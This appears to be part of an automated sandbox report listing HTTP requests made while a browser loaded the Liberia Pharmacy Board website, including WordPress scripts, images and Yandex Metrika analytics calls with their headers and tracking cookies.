        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0.2 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.3 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.3 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /metrika/tag.js HTTP/1.1Host: mc.yandex.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/plugins/debouncedresize.min.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/02/home-page-image.png HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/plugins/magnificpopup.min.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/dist/i18n.min.js?ver=5e580eb46a90c2b997e6 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.0.2 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/menu.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/plugins/visible.min.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.0.2 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/tabs.min.js?ver=1.13.3 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/assets/animations/animations.min.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /recaptcha/about/images/reCAPTCHA-logo@2x.png HTTP/1.1Host: www.google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlqHLAQiFoM0BCLnKzQEIitPNARj1yc0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/jquery/ui/core.min.js?ver=1.13.3 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/plugins/enllax.min.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/parallax/translate3d.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/scripts.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/plugins/slick.min.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_check HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2024/02/mandate2-1536x1152-1.png HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /wp-content/uploads/2017/02/Miscellaneous-480x360.jpg HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/plugins/debouncedresize.min.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/plugins/magnificpopup.min.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/menu.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/js/plugins/visible.min.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/assets/animations/animations.min.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/js/rbtools.min.js?ver=6.6.13 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /metrika/metrika_match.html HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /metrika/tag.js HTTP/1.1Host: mc.yandex.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; yandexuid=8715430261736517288; yashr=3268409401736517288
        Source: global trafficHTTP traffic detected: GET /wp-content/plugins/revslider/public/assets/js/rs6.min.js?ver=6.6.13 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/comment-reply.min.js?ver=6.7.1 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /wp-includes/js/wp-emoji-release.min.js?ver=6.7.1 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
        Source: global trafficHTTP traffic detected: GET /watch/99162160?wmode=7&page-url=https%3A%2F%2Fwww.lpb.gov.lr%2F&charset=utf-8&uah=chu%0A%22Google%20Chrome%22%3Bv%3D%22117%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228%22%2C%22Chromium%22%3Bv%3D%22117%22%0Acha%0Ax86%0Achb%0A64%0Achf%0A117.0.5938.134%0Achl%0A%22Google%20Chrome%22%3Bv%3D%22117.0.5938.134%22%2C%22Not%3BA%3DBrand%22%3Bv%3D%228.0.0.0%22%2C%22Chromium%22%3Bv%3D%22117.0.5938.134%22%0Achm%0A%3F0%0Achp%0AWindows%0Achv%0A10.0.0&browser-info=pv%3A1%3Avf%3A14pwap7gbnl70a58u0m6s2b47zyz%3Afu%3A0%3Aen%3Autf-8%3Ala%3Aen-US%3Av%3A1551%3Acn%3A1%3Adp%3A0%3Als%3A632894401814%3Ahid%3A756856224%3Az%3A-300%3Ai%3A20250110085448%3Aet%3A1736517288%3Ac%3A1%3Arn%3A547745590%3Arqn%3A1%3Au%3A1736517288271535202%3Aw%3A1280x907%3As%3A1280x1024x24%3Ask%3A1%3Afp%3A6235%3Awv%3A2%3Ads%3A48%2C619%2C732%2C264%2C2544%2C0%2C%2C%2C%2C%2C%2C%2C%3Aco%3A0%3Acpf%3A1%3Ans%3A1736517279176%3Arqnl%3A1%3Ast%3A1736517290%3At%3ALiberia%20Pharmacy%20Board&t=gdpr(14)clc(0-0-0)rqnt(1)aw(1)rcm(1)cdl(na)eco(42009088)ti(1) HTTP/1.1Host: mc.yandex.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.lpb.gov.lrSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: sync_cookie_csrf=3333922555fake
        Source: global trafficHTTP traffic detected: GET /sync_cookie_image_start?redirect_domain=mc.yandex.com&token=10611.fXHS7W61Y6QDgz-iN89SHMqW01LOq60hVQ4ZUA2FrU04b5KjMURoB7zeuL92EZhT.tLPpFu6z6BxWNZFxTt2U3r5CCVE%2C HTTP/1.1Host: mc.yandex.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.lpb.gov.lr/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: i=Ye2LpebK8L/KBVpw9aBhIoa3pbhwtEqfTBSc1BnViQeh91JgbESauH0yTfYegws1ftPKGd6rKaj8KvqSxWNFbqkQ5Kc=; yandexuid=8715430261736517288; yashr=3268409401736517288
        Source: global trafficHTTP traffic detected: GET /wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=27.0.7 HTTP/1.1Host: www.lpb.gov.lrConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cjs_id=c3cd61e3-4cc5-4bd9-93ea-9fcc444fd5fe; _ym_uid=1736517288271535202; _ym_d=1736517288
